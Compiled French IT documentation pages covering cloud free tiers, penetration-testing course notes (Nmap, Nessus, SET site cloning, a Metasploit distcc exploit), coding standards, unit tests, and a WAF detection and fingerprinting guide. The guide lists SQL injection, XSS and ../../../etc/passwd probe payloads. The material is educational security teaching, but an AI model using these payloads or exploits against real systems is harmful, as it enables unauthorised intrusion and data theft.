Documentation


Général

Général

Présentation du site

Bienvenue !

Bienvenue sur La Documentation de Nicolas, un espace regroupant une documentation variée principalement axée sur l'informatique.

Informations importantes

Les contenus proposés sur La Documentation de Nicolas sont destinés à un usage informatif et pédagogique. Malgré mes efforts pour garantir l'exactitude et la qualité des informations, des erreurs peuvent subsister. Je vous invite à croiser ces données avec d'autres sources pour confirmer leur fiabilité. Si vous trouvez une erreur ou une inexactitude, merci de la signaler à nicolas.lespinasse@vainsta.fr afin d'améliorer cette documentation.

Concernant les articles, certains d'entre eux sont rédigés par mes soins en français ou en anglais, mais une grande partie provient de sources diverses que j'ai sélectionnées pour leur utilité. Ces articles sont tirés de sources publiques et peuvent donc être copiés ou réutilisés librement. Ils sont principalement regroupés ici pour centraliser tout ce qui peut être utile de manière générale ou pour archiver les solutions aux problèmes que j'ai rencontrés, en cas de besoin futur.

Général

Cloud Service Providers Free Tier Overview

Comparing the free tier offers of the major cloud providers like AWS, Azure, GCP, Oracle Cloud etc.

1. AWS

Homepage: AWS Free Tier

Always Free

2. Azure

Homepage: Azure Free Tier

Free for Limited-time

Always Free

3. Google Cloud

Homepage: Google Cloud Free Tier

Always Free

4. Oracle Cloud

Homepage: Oracle Cloud Free Tier

Free for Limited-time 30 day free trial

Always Free

5. Alibaba Cloud

Homepage: Alibaba Cloud Free Trial

Try Over 40 Products for Free Worth $450-$1300 USD.

Now up to 12 Months Usage for Elastic Compute Services.

6. IBM Cloud

Homepage: IBM Cloud Free Tier

Free for Limited-time

7. DigitalOcean

Homepage: DigitalOcean

Free for Limited-time

8. Hetzner Cloud

Homepage: Hetzner Cloud

Free for Limited-time

9. Render

Homepage: Render

Free for Limited-time

Always Free

10. Netlify

Homepage: Netlify

Free for Limited-time

Always Free

11. JFrog

Homepage: Jfrog Free Tier

Free for Limited-time

Always Free

2GB Storage 10GB Transfer/month 2,000 CI/CD Minutes/month

12. Salesforce

Homepage: Salesforce Free Tier

Free for Limited-time

Always Free

When you download Listware for Salesforce, you are given 1,000 free credits which you can use during a free 30-day trial of the app.

13. OpenShift

Homepage: Interactive Learning Portal

Try out Openshift 4 cluster for free

Openshift 4: Try Openshift 4 cluster for free

14. Linode

Homepage: Linode

Free for Limited-time

15. Container Hosting Service

Homepage: Container Hosting Service

Currently Free

16. Cloudflare

Homepage: Cloudflare

Always free on basic plan:

17. OVHcloud

Homepage: OVH

Free for Limited-time

200€ or equivalent on all public cloud ressources for 30 days

Always free

18. Tencent Cloud

Homepage: Tencent Cloud

Multiple alternative server locations for hosting in Asia: Shanghai, Nanjing, Guangzhou, Beijing, Chengdu, Chongqing, Hong Kong, Seoul, Tokyo, Singapore, Bangkok, Jakarta, Silicon Valley, Frankfurt, Mumbai, Virginia, São Paulo, Toronto

Free for Limited-time

Always Free

19. Vercel

Homepage: Vercel

Always free

20. Zeabur

Homepage: Zeabur

Always free

Always free for developer plan

Général

Pen Test - Test d'intrusion

Le Pen Test :

Le test d'intrusion peut être employé pour différentes cibles : 

  • Une adresse IP
  • Une application
  • Un serveur Web
  • Un réseau complet

Les objectifs d'un test d'intrusion sont :

  • Identifier les vulnérabilités de son système d'information ou de son application 
  • Évaluer le degré de risque de chaque faille identifiée
  • Proposer des correctifs de manière priorisée

Le test d'intrusion permet donc de qualifier : 

  • La sévérité de la vulnérabilité

  • La complexité de la correction

  • L'ordre de priorité qu’il faut donner aux corrections

Quand faire un test d'intrusion  :

  • Durant la conception du projet

  • Pendant la phase d'utilisation du composant ou du réseau (à intervalle régulier)
  • Suite à une cyberattaque 

Deux type de test : 

  • Interne
    • Test d'intrusion depuis le réseau local
  • Externe 
    • Test d'intrusion depuis internet

Il existe trois types de test : 

  • Le test en boite noir 
    • Le testeur n'as aucune information sur le réseau au début du test, il ne connait pas non-plus de mots de passes ou d'identifiants. Il va donc rechercher des informations sur l'entreprise en général pour l'aider à trouver des vulnérabilités.   
  • Le test en boite grise
    • Le testeur dispose uniquement d'un couple identifiant/mot de passe que l'entreprise cible lui a fourni avant de démarrer la phase de test. 
    • L'objectif de ce test c'est de se mettre dans la peau d'un utilisateur "normal" au sein de l'entreprise cible.
  • Le test en boite blanche
    • Le testeur dispose de nombreuses informations comme des schémas d'infrastructure, le code source de l'application. La recherche de faille est donc très approfondie et très compète.

Les systèmes d'exploitations pour le Pen Test :

  • Linux
    • Kali Linux (regroupe l'ensemble des outils nécessaires pour procéder au test de sécurité d'un système d'information)
      • Nmap (détecte les ports ouverts)
      • Wireshark (analyse les trames réseau)
      • Metasploit (fourni des informations sur les vulnérabilités des systèmes d'information et qui les exploites)
      • Burp suite (sécurisation ou test d'intrusion des applications web)
  • Windows
    • De nombreux logiciels similaires à ceux évoqués ci-dessus sont disponible sur Windows.
  • Android
    • Des outils très performants sont disponibles sur Android
      • zANTI
      • FaceNiff
      • AndroRAT
      • cSploit

Préparer le Pen Test :

Premièrement, il faut définir un périmètre de test : 

  • Un Serveur
  • Une partie d'un réseau
  • Une IP publique
  • Plusieurs IP publiques
  • L'ensemble du réseau Interne

Avant de faire quoi que ce soit, il faut s'assurer de contracter avec l'entreprise cible pour ne pas avoir de problèmes juridiques ! Le document se nomme "mandat d'autorisation de test de pénétration"

Différentes attaques : 

  • DOS
  • DDOS
  • WEB
    • Utilisation de failles connues
    • Technique de l'homme du milieu
      • L'utilisation de la technique de l'homme du milieu ou man-in-the-middle attack. Cette attaque consiste à se positionner au milieu dans la communication entre un client et un serveur pour intercepter et modifier les paquets échangés entre les deux machines. Le logiciel « Burp suite » permet de le faire.
    • Forge de paquets HTTP
      • Cette technique consiste à écrire manuellement des requêtes HTTP, qui vont ensuite être envoyées au serveur. Ces requêtes seront non standards, avec des malformations qui peuvent générer des plantages sur le serveur Web. Le logiciel Wfetch intégré à Microsoft IIS permet de le faire.
    • Intégration de paramètres
      • Ici, nous pouvons ajouter ou modifier des paramètres dans les chemins HTTP qui seront mal interprétés par le serveur et qui permettront de l'exploiter. Aucun logiciel n'est nécessaire car c'est faisable manuellement.
    • Cross-site scripting ou XSS
      • Le cross-site scripting ou XSS. C’est un type de faille de sécurité de sites Web permettant d'injecter du contenu dans une page, provoquant ainsi des actions sur les navigateurs Web visitant la page. Par exemple, sur un serveur vulnérable, dans une zone où les utilisateurs peuvent poster un commentaire, si l'on rajoute la suite de caractères <script>alert("This Website has been hacked")</script> au prochain affichage de la page, un script s’exécutera à la place d’afficher le commentaire.
    • Injection SQL
      • Outil sur Kali : BSQL
  • Ingénierie Sociale
    • Création de site clone via Kali : social engineering toolkit

Test des réseaux sans-fils : 

  • Scan : insider, wifi analyser, Lnissid.
  • Injection de trafique : AiroDump, Rmon
  • Écoute et enregistrement du trafique : WireShark 
  • Décryptage de clés : Cain&abel, Aircrack-ng

Équipements  de protection : 

  • Pare-feu
  • IDS
  • IPS
  • Honeypot = Simule des machines d'un réseau informatique (c'est un leurre)
    • KFsensor
    • Snort

Outils pour contourner ces protections : 

  • Nmap et Hping3 (gestion de fragmentation d'une attaque pour ne pas qu'elle soit identifiée)
  • HTTP Host (côté serveur) et HTTP Port (côté client) = Établie un tunnel HTTP
  • DNS2TCP = Établie un tunnel DNS
  • Métasploit = Optenir et maintenir l'accès à distance sur une machine à l'intérieur d'un réseau cible

Partie Pratique :

Utiliser NMAP pour scanner un réseau :

nmap -sn 10.0.2.0 /24

Utiliser NESSUS pour scanner un réseau :

On va chercher la dernière version de NESSUS : https://www.tenable.com/downloads/nessus?loginAttempted=true
Puis on va installer le packer : 
dpkg -i PAQUET.deb

Puis nous démarrons le service : 

/etc/init.d/nessusd start

Définition du démarrage automatique : 

update-rc.d nessusd enable

Puis on met à jour metasploit : 

msfconsole
aptupdate;aptinstallmetasploit-framework

Puis, nous accédons au site https://kali:8834

image-1635197207503.png

On constate, après le scan, que le système n'a pas trouvé de vulnérabilités :

image-1635197472869.png

Si il y avait eu des vulnérabilités, on aurait été informés sur la façon de résoudre les problèmes de sécurité. 

Utiliser The social engineering toolkit :

Pour lancer cette applications nous allons dans l'outils recherche, 13 - Social Enginering Tools. 

image-1635198035390.png

En suite, nous devons accepter les termes du contrat :

image-1635198088150.png

Puis nous allons sélectionner l'option une :

image-1635198163646.png

Et puis, l'option 2 :

image-1635198199454.png

Puis, l'option 3 :

image-1635198247646.png

Et enfin l'option 2 : 

image-1635198272113.png

Et puis on spécifie l'url à cloner : 

image-1635198921298.png

Pour ne pas avoir de problème j'ai choisi un site qui m'appartient personnellement !

Résultat : 

image-1635198933163.png

Utiliser MSFConsole pour accéder au Shell via une vulnérabilité :

service postgresql start
msfconsole

On recherche un exploit :

image-1635200830087.png

search distcc

On utilise l'exploit : 

image-1635200911086.png

On va ensuite lister les payloads : 

show payloads

image-1635200962379.png

On choisie un payload :

image-1635201084576.png

On affiche les paramètres : 

image-1635201122326.png

Je définie l'adresse cible :

image-1635201178280.png

Dans cette exemple je me choisi moi-même !

Lancement de l'exploit : 

exploit

Rapport de Pen Test :

Critères d'évaluations :

  • Sévérité
    • Standard CVSS

       

  • Complexité
    • Facile
    • Modérée
    • Complexe
  • Priorité
    • Urgente
    • Standard
    • Basse

On peux chercher les détailles d'une faille via les numéros CVEC (numéro attribué à chaque faille rendue publique).

image-1635206278767.png

Le rapport du Pentest peut-être adressé au : 

  • DSI
  • Responsable système et réseau
  • Équipes d'informatiques
  • Prestataires

Le rapport doit donc être rédigé de telle façon à ce qu'une personne ne possédant pas de capacité techniques poussée comprenne son contenu !

Structure : 

  • Format = PDF 10 pages
  • Document confidentiel
  • Rédigé en français ou en anglais
  • Sommaire
  • Contexte et périmètre
  • Conditions du test internet / externe 
  • Méthodologie de test
  • Axes d'évaluations
  • Résultats
  • Synthèses  

Présenté le travail réalisé :

Il est préférable de faire une réunion avec le client pour revoir avec lui le rapport et les vulnérabilités trouvées. Il faut faire attention à la forme de la présentation. Il est important que le client comprenne vos travaux pour apporter une correction adéquate. 

Programmation

Programmation

Standard de codage

Définition (Wikipédia)

Les règles de codage sont un ensemble de règles à suivre pour uniformiser les pratiques de développement logiciel, diffuser les bonnes pratiques de développement et éviter les erreurs de développement “classiques” au sein d’un groupe de développeurs. Les règles de codage s’articulent autour de plusieurs thèmes, les plus courants étant :

  1. Le nommage et l’organisation des fichiers du code source
  2. Le style d’indentation
  3. Les conventions de nommage, ou règles de nommage
  4. Les commentaires et documentation du code source
  5. Recommandations sur la déclaration des variables
  6. Recommandations sur l’écriture des instructions, des structures de contrôle et l’usage des parenthèses dans les expressions.

Ressources documentaires

Wikipedia

GNU Coding standard

clang_format

clang

LLVM

Indentation du code

En informatique : l’indentation consiste en l’ajout de tabulations ou d’espaces dans un fichier, pour une meilleure lecture et compréhension du code

Indenter automatiquement votre code

CTRL+A sélectionne le texte
CTRL+I formate automatiquement la sélection dans QT

Lignes orphelines

Les lignes sans codes, ou lignes orphelines doivent être supprimées, sauf si elles servent à délimiter les blocs d’instructions (comme par exemple entre la déclaration des variables et le début des instructions)

Conventions de nommage à respecter

Déclaration des variables

**Exemple ( je veux déclarer un entier contenant des notes) **

int notes; 

**Exemple (Je veux déclarer un tableau contenant des notes ( comme 14,34 ou 5,75) **

float tabNote[10];

int *ptrNote = nullptr;

Convention de nommage

Je respecte la notation lowerCamelCase pour mes variables et fonctions

Variables et fonctions

**Exemple (Je veux déclarer un entier contenant un nombre de livres) **

int nombreLivre;

**Exemple (Je veux déclarer une fonction pour sauver une image en niveau de gris) **

void sauverImageNiveauGris();

Les macro

**Exemple, une macro qui calcule le max de deux nombres **

#define MAX(x,y) ((x)>(y)?(x):(y))

Les structures

**Exemple, j’ai une structure Pixel **

typedef struct { 
        unsigned char red; 
        unsigned char blue; 
        unsigned char green; 
      }  Pixel;

Pixel monPixel; 

Les classes

NOM DES CLASSES

**Exemple, une classe contenant des informations sur des avions sera déclarée ainsi **

class CAvion  {
  public :
    //Méthodes publiques
  private :
    //Méthodes et attributs privés
};

MÉTHODES DE LA CLASSE

ATTRIBUTS DE LA CLASSE

**Exemple (un attribut contenant un prénom) **

string _prenom; 

CLASSE CAVION AVEC MÉTHODES ET ATTRIBUTS

class CAvion  {
  public :
    int controlerAssiette(); 
  private:
    float _altitude; 
};
Programmation

Documenter son code

Documentation des fichiers du projet

Chaque fichier doit avoir sa documentation au début de celui-ci

Exemple

/**
 * @file Nom du fichier
 * @brief Résumé du rôle du module/classe
 * @brief On peut continuer le résumé sur plusieurs lignes
 * @author Auteur du fichier
 * @version v1.0
 * @class Nom de la classe (si POO)
 * @date 01/01/1900
 */

Documentation des fonctions ou méthodes

Cas général

/**
 * @fn  type nomFonction(type parametre1, type parametre2);
 * @brief Résumé de la fonction
 * @param type parametre1 : Le rôle du paramètre 1
 * @param type parametre2 : Le rôle du paramètre 2
 * @return type : le rôle de la valeur de retour
 */
    
type nomFonction(type parametre1, type parametre2);

Exemple : méthode string findClientName(int idClient);

/**
 * @fn  string findClientName(int idClient);
 * @brief trouve le nom du client en fonction de son id
 * @param int idClient : l'id du client à rechercher
 * @return string : nom du client
 */
    
string findClientName(int idClient);

Attribut des classes

Cas général

type nom; //!< rôle de l'attribut

Exemple

QSqlDatabase _dbParking; //!< base de données

Balises supplémentaires

@code

Cette balise permet d’insérer un exemple de code dans la documentation

/**
 * @code
 * #include <iostream>
 *
 * int main()
 *{
 * //Your code
 *
 *  return 0;
 *}
 * @endcode
**/

Doxyfile

On peut ensuite générer la documentation grâce à doxygen

Si doxygen n’est pas installé sur le PC, exécuter la commande suivante

apt install doxygen graphviz doxygen-gui

Ensuite, on peut générer la documentation

Exemple de doxyfile C

Exemple de doxyfile cpp

Générer automatiquement la documentation avec le pipeline Gitlab CI/CD

stages:
  - deploy

pages:
    stage: deploy
    script:
        - doxygen Doxyfile
        - mv html/ public/
    artifacts:
        paths:
        - public


ToDo

Doc gitlab et doxygen

Programmation

Tests unitaires démo pratique

1 - Un exemple avec des tests

Considérez l'exemple d'une structure de données "file" (ou queue en anglais), tel que les éléments les premiers entrés sont aussi les premiers sortis (First In, First Out) : https://git.vainsta.fr/share/queue.

Ce petit projet se compose de plusieurs fichiers, dont voici une brève description :

La compilation du projet et l'exécution des tests se fait de la manière suivante :

$ mkdir build ; cd build
$ cmake .. ; make         # compilation
$ make test               # lancement des tests

La commande make test va lancer l'exécution de tous les tests définis dans CMakeLists.txt et qui sont implémentés dans le fichier test_queue.c. La fonction main() prend en paramètre le nom du test à exécuter (init_free, push, pop, length, empty) et appelle la fonction de test associée.

Ainsi, l'exécution de la commande ci-dessous exécute un test, qui a pour objectif de vérifier le code de la fonction queue_length() de notre module queue :

$ ./test_queue length        # execution du test "length"
$ echo $?                    # afficher le code de retour de la commande précédente
0                            # 0 => success!

On considère qu'un test est réussi (success) si et seulement si le code de retour du programme de test est égal à 0, c'est-à-dire que la fonction main() renvoie la valeur EXIT_SUCCESS (ou 0). Toutes les autres valeurs de retour correspondent à des cas d'erreur !

En résumé :

Plus l'écriture d'un test est "précise", plus il doit être facile de conclure qu'il y a un bug dans la fonction testée (et non pas dans une autre fonction). L'ensemble des tests doit couvrir toutes les fonctions de notre module et être le plus exhaustif possible !

Notez que la commande make test va appeler le framework CTest (intégré à CMake) qui affiche un petit rapport d'exécution de tous les tests...

$ make test
Running tests...
Test project /home/orel/Documents/pt2/misc/queue/build
    Start 1: test_queue_new_free
1/8 Test #1: test_queue_new_free ..............   Passed    0.00 sec
    Start 2: test_queue_push_head
2/8 Test #2: test_queue_push_head .............   Passed    0.00 sec
    Start 3: test_queue_pop_head
3/8 Test #3: test_queue_pop_head ..............   Passed    0.00 sec
    Start 4: test_queue_push_tail
4/8 Test #4: test_queue_push_tail .............   Passed    0.00 sec
    Start 5: test_queue_pop_tail
5/8 Test #5: test_queue_pop_tail ..............   Passed    0.00 sec
    Start 6: test_queue_length
6/8 Test #6: test_queue_length ................   Passed    0.00 sec
    Start 7: test_queue_empty
7/8 Test #7: test_queue_empty .................   Passed    0.00 sec
    Start 8: test_queue_clear
8/8 Test #8: test_queue_clear .................   Passed    0.00 sec

100% tests passed, 0 tests failed out of 8

Total Test time (real) =   0.03 sec

2 - Annexes

Un exemple de fonction test

Voici un exemple de test (à compléter) pour la fonction game_is_empty() du jeu Takuzu :

bool test_is_empty(void)
{
  game g = game_default();
  bool test1 = game_is_empty(g, 0, 0);
  bool test2 = !game_is_empty(g, 5, 5);
  game_delete(g);
  return test1 && test2;
}

Informatique

Informatique

Everything about web application firewalls (WAFs) from a security perspective. 🔥

how-wafs-work.png A Concise Definition: A firewall is a security policy enforcement point positioned between a web application and the client endpoint. This functionality can be implemented in software or hardware, running in an appliance device, or in a typical server running a common operating system. It may be a stand-alone device or integrated into other network components. (Source: PCI DSS IS 6.6)

A web-application firewall sits between a user and a webapp and is tasked to prevent any malicious activity from reaching the webapp. A WAF either filters out the malicious part of the request or just simply blocks it.

Feel free to contribute.

Contents:

Introduction:

How WAFs Work:

Operation Modes:

Testing Methodology:

Where To Look:

Detection Techniques:

To identify WAFs, we need to (dummy) provoke it.

  1. Make a normal GET request from a browser, intercept and record response headers (specifically cookies).
  2. Make a request from command line (eg. cURL), and test response content and headers (no user-agent included).
  3. Make GET requests to random open ports and grab banners which might expose the WAFs identity.
  4. On login pages, inject common (easily detectable) payloads like " or 1 = 1 --.
  5. Inject noisy payloads like <script>alert()</script> into search bars, contact forms and other input fields.
  6. Attach a dummy ../../../etc/passwd to a random parameter at end of URL.
  7. Append some catchy keywords like ' OR SLEEP(5) OR ' at end of URLs to any random parameter.
  8. Make GET requests with outdated protocols like HTTP/0.9 (HTTP/0.9 does not support POST type queries).
  9. Many a times, the WAF varies the Server header upon different types of interactions.
  10. Drop Action Technique - Send a raw crafted FIN/RST packet to server and identify response.

    Tip: This method could be easily achieved with tools like HPing3 or Scapy.

  11. Side Channel Attacks - Examine the timing behaviour of the request and response content.

    Tip: More details can be found in a blogpost here.

WAF Fingerprints

Wanna fingerprint WAFs? Lets see how.

NOTE: This section contains manual WAF detection techniques. You might want to switch over to next section.

WAF Fingerprints
360
  • Detectability: Easy
  • Detection Methodology:
    • Returns status code 493 upon unusual requests.
    • Blockpage may contain reference to wzws-waf-cgi/ directory.
    • Blocked response page source may contain:
      • Reference to wangshan.360.cn URL.
      • Sorry! Your access has been intercepted because your links may threaten website security. text snippet.
    • Response headers may contain X-Powered-By-360WZB header.
    • Blocked response headers contain unique header WZWS-Ray.
    • Server header may contain value qianxin-waf.
aeSecure
  • Detectability: Moderate
  • Detection Methodology:
    • Blocked response content contains aesecure_denied.png image (view source to see).
    • Response headers contain aeSecure-code value.
Airlock
  • Detectability: Moderate/Difficult
  • Detection Methodology:
    • Set-Cookie headers may contain:
      • AL-SESS cookie field name (case insensitive).
      • AL-LB value (case insensitive).
    • Blocked response page contains:
      • Server detected a syntax error in your request text.
      • Check your request and all parameters text snippet.
AlertLogic
  • Detectability: Difficult
  • Detection Methodology:
    • Blocked response page contains:
      • We are sorry, but the page you are looking for cannot be found text snippet.
      • The page has either been removed, renamed or temporarily unavailable text.
      • 404 Not Found in red letters.
Aliyundun
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response page contains:
      • Sorry, your request has been blocked as it may cause potential threats to the server's security text snippet.
      • Reference to errors.aliyun.com site URL.
    • Blocked response code returned is 405.
Anquanbao
  • Detectability: Easy
  • Detection Methodology:
    • Returns blocked HTTP response code 405 upon malicious requests.
    • Blocked response content may contain /aqb_cc/error/ or hidden_intercept_time.
    • Response headers contain X-Powered-by-Anquanbao header field.
Anyu
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response content contains Sorry! your access has been intercepted by AnYu
    • Blocked response page contains AnYu- the green channel text.
    • Response headers may contain unusual header WZWS-RAY.
Approach
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response page content may contain:
      • Approach Web Application Firewall Framework heading.
      • Your IP address has been logged and this information could be used by authorities to track you. warning.
      • Sorry for the inconvenience! keyword.
      • Approach infrastructure team text snippet.
    • Server header has field value set to Approach.
Armor Defense
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response content contains:
      • This request has been blocked by website protection from Armor text.
      • If you manage this domain please create an Armor support ticket snippet.
ArvanCloud
  • Detectability: Easy
  • Detection Methodology:
    • Server header contains ArvanCloud keyword.
ASPA
  • Detectability: Easy
  • Detection Methodology:
    • Server header contains ASPA-WAF keyword.
    • Response contain unique header ASPA-Cache-Status with content HIT or MISS.
ASP.NET Generic
  • Detectability: Moderate
  • Detection Methodology:
    • Response headers may contain X-ASPNET-Version header value.
    • Blocked response page content may contain:
      • This generic 403 error means that the authenticated user is not authorized to use the requested resource.
      • Error Code 0x00000000< keyword.
    • X-Powered-By header has field value set to ASP.NET.
Astra
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response page content may contain:
      • Sorry, this is not allowed. in h1.
      • our website protection system has detected an issue with your IP address and wont let you proceed any further text snippet.
      • Reference to www.getastra.com/assets/images/ URL.
    • Response cookies has field value cz_astra_csrf_cookie in response headers.
AWS ELB
  • Detectability: Moderate
  • Detection Methodology:
    • Response headers might contain:
      • AWSALB cookie field value.
      • X-AMZ-ID header.
      • X-AMZ-REQUEST-ID header.
    • Response page may contain:
      • Access Denied in their keyword.
      • Request token ID with length from 20 to 25 between RequestId tag.
    • Server header field contains awselb/2.0 value.
Baidu Yunjiasu
  • Detectability: Moderate
  • Detection Methodology:
    • Server header may contain Yunjiasu-nginx value.
    • Server header may contain Yunjiasu value.
Barikode
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response page content contains:
      • BARIKODE keyword.
      • Forbidden Access text snippet in h1.
Barracuda
  • Detectability: Moderate
  • Detection Methodology:
    • Response cookies may contain barra_counter_session value.
    • Response headers may contain barracuda_ keyword.
  • Response page contains:
    • You have been blocked heading.
    • You are unable to access this website text.
Bekchy
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response headers contains Bekchy - Access Denied.
    • Blocked response page contains reference to https://bekchy.com/report.
BinarySec
  • Detectability: Moderate
  • Detection Methodology:
    • Response headers contain:
      • X-BinarySec-Via field.
      • X-BinarySec-NoCache field.
      • Server header contains BinarySec keyword.
BitNinja
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response page may contain:
      • Security check by BitNinja text snippet.
      • your IP will be removed from BitNinja.
      • Visitor anti-robot validation text snippet.
      • (You will be challenged by a reCAPTCHA page) text.
BIG-IP ASM
  • Detectability: Moderate
  • Detection Methodology:
    • Response headers may contain BigIP or F5 keyword value.
    • Response header fields may contain X-WA-Info header.
    • Response headers might have jumbled X-Cnection field value.
BlockDos
  • Detectability: Moderate
  • Detection Methodology:
    • Server header contains value BlockDos.net.
Bluedon IST
  • Detectability: Easy
  • Detection Methodology:
    • Server header contains BDWAF field value.
    • Blocked response page contains to Bluedon Web Application Firewall text snippet..
BulletProof Security Pro
  • Detectability: Moderate
  • Detection Methodology:
    • Blocked response page contains:
      • div with id as bpsMessage text snippet.
      • If you arrived here due to a search or clicking on a link click your Browser's back button to return to the previous page. text snippet.
CDN NS Application Gateway
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response page contains CdnNsWAF Application Gateway text snippet.
Cerber (WordPress)
  • Detectability: Difficult
  • Detection Methodology:
    • Blocked response page contains:
      • We're sorry, you are not allowed to proceed text snippet.
      • Your request looks suspicious or similar to automated requests from spam posting software warning.
Chaitin Safeline
  • Detectability: Difficult
  • Detection Methodology:
    • Blocked response page contains event_id keyword within HTML comments.
ChinaCache
  • Detectability: Easy
  • Detection Methodology:
    • Response headers contain Powered-by-ChinaCache field.
Cisco ACE XML Gateway
  • Detectability: Moderate
  • Detection Methodology:
    • Server header has value ACE XML Gateway set.
Cloudbric
  • Detectability: Moderate
  • Detection Methodology:
    • Response content contains:
      • Malicious Code Detected heading.
      • Your request was blocked by Cloudbric text snippet.
      • Reference to https://cloudbric.zendesk.com URL.
      • Cloudbric Help Center text.
      • Page title starting with Cloudbric | ERROR!.
Cloudflare
  • Detectability: Easy
  • Detection Methodology:
    • Response headers might have cf-ray field value.
    • Server header field has value cloudflare.
    • Set-Cookie response headers have __cfuid= cookie field.
    • Page content might have Attention Required! or Cloudflare Ray ID:.
    • Page content may contain DDoS protection by Cloudflareas text.
    • You may encounter CLOUDFLARE_ERROR_500S_BOX upon hitting invalid URLs.
CloudfloorDNS
  • Detectability: Easy
  • Detection Methodology:
    • Server header field has value CloudfloorDNS WAF.
    • Block-page title might have CloudfloorDNS - Web Application Firewall Error.
    • Page content may contain www.cloudfloordns.com/contact URL as a contact link.
Cloudfront
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response content contains Generated by cloudfront (CloudFront) error upon malicious request.
Comodo cWatch
  • Detectability: Easy
  • Detection Methodology:
    • Server header contains Protected by COMODO WAF value.
CrawlProtect
  • Detectability: Easy
  • Detection Methodology:
    • Response cookies might contain crawlprotect cookie name.
    • Block Page title has CrawlProtect keyword in it.
    • Blocked response content contains value
      This site is protected by CrawlProtect !!! upon malicious request.
Deny-All
  • Detectability: Difficult
  • Detection Methodology:
    • Response content contains value Condition Intercepted.
    • Set-Cookie header contains cookie field sessioncookie.
Distil Web Protection
  • Detectability: Easy
  • Detection Methodology:
    • Response headers contain field value X-Distil-CS in all requests.
    • Blocked response page contains:
      • Pardon Our Interruption... heading.
      • You have disabled javascript in your browser. text snippet.
      • Something about your browser made us think that you are a bot. text.
DoSArrest Internet Security
  • Detectability: Easy
  • Detection Methodology:
    • Response headers contain field value X-DIS-Request-ID.
    • Server header contains DOSarrest keyword.
DotDefender
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response content contains value
      dotDefender Blocked Your Request.
    • Blocked response headers contain X-dotDefender-denied field value.
DynamicWeb Injection Check
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response headers contain X-403-Status-By field with value dw-inj-check value.
e3Learning Security
  • Detectability: Easy
  • Detection Methodology:
    • Server header contains e3Learning_WAF keyword.
EdgeCast (Verizon)
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response content contains value
      Please contact the site administrator, and provide the following Reference ID:EdgeCast Web Application Firewall (Verizon).
    • Blocked response code returns 400 Bad Request on malicious requests.
Eisoo Cloud
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response page content may contain:
      • /eisoo-firewall-block.css reference.
      • www.eisoo.com URL.
      • © (year) Eisoo Inc. keyword.
    • Server header has field value set to EisooWAF-AZURE/EisooWAF.
Expression Engine
  • Detectability: Difficult
  • Detection Methodology:
    • Blocked response page returns Invalid URI generally.
    • Blocked response content contains value Invalid GET Request upon malicious GET queries.
    • Blocked POST type queries contain Invalid Data in response content.
F5 ASM
  • Detectability: Difficult
  • Detection Methodology:
    • Blocked response content contains warning
      The requested URL was rejected. Please consult with your administrator.
FortiWeb
  • Detectability: Moderate
  • Detection Methodology:
    • Response headers contain FORTIWAFSID= on malicious requests.
    • Blocked response page contains:
      • Reference to .fgd_icon image icon.
      • Server Unavailable! as heading.
      • Server unavailable. Please visit later. as text.
GoDaddy
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response page contains value
      Access Denied - GoDaddy Website Firewall.
GreyWizard
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response page contains:
      • Grey Wizard as title.
      • Contact the website owner or Grey Wizard text snippet.
      • We've detected attempted attack or non standard traffic from your IP address text snippet.
    • Server header contain greywizard keyword.
Huawei Cloud
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response page contains:
      • Reference to account.hwclouds.com/static/error/images/404img.jpg error image.
      • Reference to www.hwclouds.com URL.
      • Reference to hws_security@{site.tld} e-mail for reporting.
HyperGuard
  • Detectability: Difficult
  • Detection Methodology:
    • Set-Cookie header has cookie field ODSESSION= in response headers.
IBM DataPower
  • Detectability: Difficult
  • Detection Methodology:
    • Response headers contains field value value X-Backside-Transport with value OK or FAIL.
Imperva Incapsula
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response page content may contain:
      • Powered By Incapsula text snippet.
      • Incapsula incident ID keyword.
      • _Incapsula_Resource keyword.
      • subject=WAF Block Page keyword.
    • Normal GET request headers contain visid_incap value.
    • Response headers may contain X-Iinfo header field name.
    • Set-Cookie header has cookie field incap_ses and visid_incap.
Imunify360
  • Detectability: Easy
  • Detection Methodology:
    • Server header contain imunify360-webshield keyword.
    • Response page contains:
      • Powered by Imunify360 text snippet.
      • imunify360 preloader if response type is JSON.
    • Blocked response page contains protected by Imunify360 text.
IndusGuard
  • Detectability: Moderate
  • Detection Methodology:
    • Server header contains value IF_WAF.
    • Blocked response content contains warning
      further investigation and remediation with a screenshot of this page.
    • Response headers contain a unique header X-Version.
Instart DX
  • Detectability: Easy
  • Detection Methodology:
    • Response headers contain X-Instart-Request-ID unique header.
    • Response headers contain X-Instart-WL unique header fingerprint.
    • Response headers contain X-Instart-Cache unique header fingerprint.
    • Blocked response page contains The requested URL was rejected. Please consult with your administrator. text.
ISA Server
  • Detectability: Difficult
  • Detection Methodology:
    • Response page contains:
      • The ISA Server denied the specified Uniform Resource Locator (URL) text snippet.
      • The server denied the specified Uniform Resource Locator (URL). Contact the server administrator. text snippet
Janusec Application Gateway
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response page has image displaying JANUSEC name and logo.
    • Blocked response page displays Janusec Application Gateway on malicious requests.
Jiasule
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response page contains reference to static.jiasule.com/static/js/http_error.js URL.
    • Set-Cookie header has cookie field __jsluid= or jsl_trackingin response headers.
    • Server header has jiasule-WAF keywords.
    • Blocked response content has notice-jiasule keyword.
KeyCDN
  • Detectability: Easy
  • Detection Methodology:
    • Server header contains KeyCDN keyword.
KnownSec
  • Detectability: Easy
  • Detection Methodology:
    • Blocked response page displays ks-waf-error.png image (view source to see).
KONA Site Defender (Akamai)
  • Detectability: Easy
  • Detection Methodology:
